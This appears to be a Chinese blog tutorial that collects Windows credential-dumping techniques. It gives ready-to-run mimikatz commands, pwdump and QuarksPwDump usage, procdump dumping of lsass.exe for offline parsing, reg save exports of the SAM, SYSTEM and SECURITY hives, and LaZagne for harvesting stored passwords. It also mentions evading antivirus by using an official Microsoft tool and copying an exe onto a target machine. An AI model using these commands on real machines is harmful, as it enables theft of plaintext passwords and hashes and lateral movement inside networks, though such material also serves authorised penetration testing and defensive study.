目录
1 mimikatz
工具下载地址:Releases · gentilkiwi/mimikatz · GitHub
在cmd的命令里输入
privilege::debug //提升权限 sekurlsa::logonpasswords //抓取密码
结果如下,直接爆出来了明文,
2 wce
一直不能运行,暂存
3PwDump
工具下载地址:Windows PWDUMP tools
保证这两个文件在同一目录下,然后管理员运行cmd,pwdump7 运行结果如下:
pwdump8下载下来没有libeay32.dll文件,我把这个文件copy过来,放在与pwdump8.exe同一目录下,运行结果如下,可以发现pwdump8比pwdump7多了域的信息,加上了lm hash的值(这个值其实也没什么用,因为aad3b435b51404eeaad3b435b51404ee是lm hash被禁用后的默认值)
4 Quarks PwDump
Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。
PwDump支持的操作系统为Windows XP/Windows 2003/Windows Vista/Windows 7/Windows 2008/Windows 8。在Windows的密码系统中,密码以加密的方式保存在/windows/system32/config/下的sam文件里,而账号在登录后会将密码的密文和明文保存在系统的内存中。正常情况下系统启动后,sam文件是不能被读取的,但是PwDump就能读取sam.
(1)QuarksPwDump.exe参数说明:
-dhl 导出本地哈希值
-dhdc导出内存中的域控哈希值
-dhd 导出域控哈希值,必须指定NTDS文件
-db 导出Bitlocker信息,必须指定NTDS文件
-nt 导出ntds文件
-hist 导出历史信息,可选项
-t 导出类型可选默认导出为John类型。
-o 导出文件到本地
(2)、执行抓取用户密码的命令quarksPwDump.exe --dump-hash-local -o hash.txt,我们将抓取到的本地用户的密码保存到本地目录下的hash.txt中,保存的位置以及文件名自己可以设置:
quarksPwDump.exe --dump-hash-local -o hash.txt
5 prcodump+mimikatz
procdump,官方工具(意味着不会被当成病毒杀了),可将lsass.exe转储成dmp文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp #32位系统 procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统
然后用mimikatz读取,如果没有mimiatz,就要将dmp文件拖到本机上读取。
sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords full
6 注册表+mimikatz
先通过系统行命令导出如下三个文件:
reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive
然后在本地上就可以用mimikatz来读取这三个文件
lsadump::sam /sam:sam.hive /system:system.hive /security:security.hive
7 LaZagne
LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序。每个软件都使用不同的技术(纯文本、API、自定义算法、数据库等)存储其密码。LaZagne 的作用就是找到最常用的一些软件的密码。
LaZagne 几乎支持市面上大部分常用工具。包括浏览器、Git、SVN、Wifi、Databases 等。但是对聊天软件的支持不够本土化,主要支持一些国外的聊天软件。
LaZagne 自身基于py,跨平台性相对较好。但是有时候如果目标机器上没有 py 环境,我们可以把 py 转换成 exe 扔到目标机器上。
下载链接:https://github.com/AlessandroZ/LaZagne
Release 2.4.3 · AlessandroZ/LaZagne · GitHub
建议还是使用exe,py的需要安一堆依赖
pip install -r requirements.txt
我这里直接使用exe的
参考链接: